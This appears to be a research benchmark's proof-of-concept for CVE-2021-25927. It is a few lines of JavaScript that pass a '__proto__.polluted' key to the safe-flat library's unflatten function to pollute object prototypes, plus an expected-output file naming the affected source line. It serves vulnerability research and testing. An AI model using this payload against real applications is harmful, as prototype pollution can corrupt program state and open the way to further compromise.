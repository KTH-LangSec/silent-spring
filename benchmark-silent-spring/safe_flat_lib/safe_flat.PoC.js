//https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25927
var safeFlat = require("safe-flat");
safeFlat.unflatten({"__proto__.polluted": "yes"}, '.');//payload
  