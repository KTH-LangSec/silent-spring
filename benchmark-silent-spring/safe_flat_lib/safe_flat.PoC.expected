node_modules/safe-flat/src/index.js:48:30